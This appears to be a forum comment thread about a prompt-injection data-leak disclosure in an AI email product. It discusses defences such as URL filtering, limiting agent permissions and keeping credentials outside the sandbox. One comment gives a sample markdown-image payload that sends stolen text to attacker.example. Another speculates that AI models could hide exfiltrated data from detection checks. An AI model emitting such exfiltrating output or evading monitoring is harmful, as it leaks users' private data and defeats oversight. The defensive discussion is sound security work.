As limited as they are, LLMs are demonstrably smarter than a whole lot of people, and the number of people more clever than the best AI is going to dwindle, rapidly, especially in the domain of doing sneaky shit really fast on a computer.
There are countless examples of schemes in stories where codes and cryptography are used to exfiltrate information and evade detection, and these models are trained on every last piece of technical, practical text humanity has produced on the subject. All they have to do is work out what checks are likely being run and mash together two or three schemes they think are likely to go under the radar.
“This is good for AI.”
I'm impressed Superhuman seems to have handled this so well - lots of big names are fumbling with AI vuln disclosures. Grammarly is not necessarily who I would have bet on to get it right
I wonder how they handled it. Everybody's connecting their AI to the Web, but that automatically means any data the AI has access to can be extracted by an attacker. The only safe ways forward are to 1. disconnect the Web, or 2. filter the generated URLs aggressively.
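For option 2, a minimal sketch of what aggressive filtering could look like, assuming an allowlist of hosts and a ban on query strings; the hosts and function names here are made up for illustration:

    # Hypothetical URL filter applied to everything the model generates
    # before it is rendered or fetched.
    from urllib.parse import urlparse

    ALLOWED_HOSTS = {"docs.example.com", "status.example.com"}  # illustrative allowlist

    def is_safe_url(url: str) -> bool:
        parsed = urlparse(url)
        if parsed.scheme != "https":
            return False
        if parsed.hostname not in ALLOWED_HOSTS:
            return False
        # Query strings and fragments are the usual place to smuggle data out.
        if parsed.query or parsed.fragment:
            return False
        return True

    def filter_generated_urls(urls: list[str]) -> list[str]:
        return [u for u in urls if is_safe_url(u)]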
We should have a clearer view of the AI's permissions and the operations it performs, plus a once-a-day button to accept or deny the operations it wants to run on given data, instead of auto-approval.
Private data, untrusted data, communication: an LLM can safely have two of these, but never all three.
Browsing the web is both communication and untrusted data, so it must never have access to any private data if it has the ability to browse the web.
The problem is, so much of what people want from these things involves having all three.
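One way to make that rule concrete is to check an agent's capabilities at configuration time; a hypothetical sketch with made-up field names:

    # Hypothetical "two of three" check for the trifecta described above.
    from dataclasses import dataclass

    @dataclass
    class AgentCapabilities:
        private_data: bool       # e.g. inbox contents, files, credentials
        untrusted_input: bool    # e.g. web pages, inbound email
        communication: bool      # e.g. outbound HTTP, sending mail, rendering images

    def assert_not_lethal(caps: AgentCapabilities) -> None:
        if caps.private_data and caps.untrusted_input and caps.communication:
            raise ValueError("Agent combines private data, untrusted input, and "
                             "an outbound channel; drop at least one.")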
Are you f*cking kidding me? Grammarly is like the best one!
The primary exfiltration vector for LLMs is making network requests via image URLs with sensitive data encoded as query parameters.
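For anyone who hasn't seen it, a hypothetical example of the pattern: injected instructions get the model to emit a markdown image whose URL carries the data, and the client exfiltrates it simply by rendering the image (the attacker domain is made up):

    # Hypothetical exfiltration via an auto-rendered image URL.
    from urllib.parse import quote

    stolen = "meeting with acme, budget $2M"   # something the model could read
    injected_output = f"![loading](https://attacker.example/pixel.gif?d={quote(stolen)})"
    # The moment a client renders that image, it issues a GET to attacker.example
    # with the secret sitting in the query string, where the server logs it.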
As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like Rails credentials, but without the secret key in the .env
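A minimal sketch of that idea, assuming Fernet-encrypted credentials checked into the repo with the key kept outside the project tree; none of this is how Rails or Claude Code actually do it, and the paths and names are illustrative:

    # Hypothetical encrypted-credentials setup: the sandboxed tool can read
    # credentials.enc, but the key lives outside the working directory.
    import json
    from pathlib import Path
    from cryptography.fernet import Fernet  # pip install cryptography

    KEY_PATH = Path.home() / ".config" / "myapp" / "master.key"  # outside the repo
    CRED_PATH = Path("credentials.enc")                          # inside the repo

    def write_credentials(secrets: dict) -> None:
        key = Fernet.generate_key()
        KEY_PATH.parent.mkdir(parents=True, exist_ok=True)
        KEY_PATH.write_bytes(key)
        CRED_PATH.write_bytes(Fernet(key).encrypt(json.dumps(secrets).encode()))

    def read_credentials() -> dict:
        key = KEY_PATH.read_bytes()
        return json.loads(Fernet(key).decrypt(CRED_PATH.read_bytes()))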
So you are going to take the untrusted tool that kept leaking your secrets, keep the secrets away from it but still use it to code the thing that uses the secrets? Are you actually reviewing the code it produces? In 99% of cases that's a "no" or a soft "sometimes".
That's exactly what one does with their employees when one deploys "credential vaults", so?
One tactic I've seen used in various situations is proxies outside the sandbox that augment requests with credentials / secrets etc.
Doesn't help in the case where the LLM is processing actually sensitive data, ofc.
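A minimal sketch of that pattern, assuming a tiny forwarding proxy running outside the sandbox that injects the real key, so the tool inside only ever sees http://localhost:8088 (Flask and the upstream URL are illustrative choices, not from the thread):

    # Hypothetical credential-injecting proxy; the sandboxed tool never sees API_KEY.
    import os
    import requests
    from flask import Flask, Response, request

    app = Flask(__name__)
    UPSTREAM = "https://api.example.com"        # illustrative upstream service
    API_KEY = os.environ["UPSTREAM_API_KEY"]    # set only in the proxy's environment

    @app.route("/<path:path>", methods=["GET", "POST"])
    def forward(path):
        resp = requests.request(
            method=request.method,
            url=f"{UPSTREAM}/{path}",
            params=request.args,
            data=request.get_data(),
            headers={"Authorization": f"Bearer {API_KEY}"},
            timeout=30,
        )
        return Response(resp.content, status=resp.status_code,
                        content_type=resp.headers.get("Content-Type"))

    if __name__ == "__main__":
        app.run(port=8088)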
Can't use a tool like dotenvx?
Personally, I'd expect a product called SuperHuman to scam me in every way possible, although I know it's just a fancy name for a B2B automation company / mass-mail service
This demonstrates how adding AI features to software such as web browsers dramatically increases the attack surface. It has to be considered potentially malicious and jailed, and hopefully everyone remembers to respect that jail and put up guardrails. Given our history of chroots and jails and containers and virtualization, we know escapes are going to happen. Reminds me of Word and Excel viruses, when scripting was added to documents and left on by default.
Why does an agent tasked with summarizing email have access to anything else? There's plenty of difference between an agent and a background service or daemon, but at minimum it has to be given the same scope restrictions one of those would get, or that an intern using your system for the same purpose would. Developers need to bring the same zero-trust (ZTA) mindset to agent permissions that they would to building the other services and infrastructure they rely on.
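In practice that can be as blunt as an explicit per-agent tool allowlist checked before any call is dispatched; a hypothetical sketch, not tied to any particular agent framework:

    # Hypothetical least-privilege policy: the summarizer gets read-only mail
    # access and nothing else.
    AGENT_POLICIES = {
        "email_summarizer": {"mail.read"},                  # no send, no web, no files
        "research_assistant": {"web.fetch", "notes.write"},
    }

    def dispatch_tool(agent: str, tool: str, call):
        allowed = AGENT_POLICIES.get(agent, set())
        if tool not in allowed:
            raise PermissionError(f"{agent} is not allowed to call {tool}")
        return call()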
“Move fast and break things.” It’s funny you even need to ask on hacker news of all places. ;)
Programming used to prevent this by separating code from data. AI (currently) has no such safeguards.
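For comparison, the classic form of that safeguard is parameterized SQL: the query text is fixed code, untrusted input is bound as data, and it can never change the statement's structure. Prompt injection has no equivalent boundary today. A small self-contained example:

    # Code/data separation the old way: hostile input stays data.
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")

    user_input = "alice'; DROP TABLE users; --"   # attacker-controlled "data"
    conn.execute("INSERT INTO users (name) VALUES (?)", (user_input,))  # bound, not executed

    print(conn.execute("SELECT name FROM users").fetchall())
    # The injection attempt is stored as a literal string; the table survives.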
Reality doesn't have a distinction between "code" and "data"; those are categories of convenience, and don't even have a proper definition (what is code and what is data depends on who's asking and why). Any such distinction requires mechanically enforcing it; AI won't have it, because it's not natural, and adding it destroys the generality of the model.
OK, then sequence your DNA and send it to me. I will make sure to use it as code!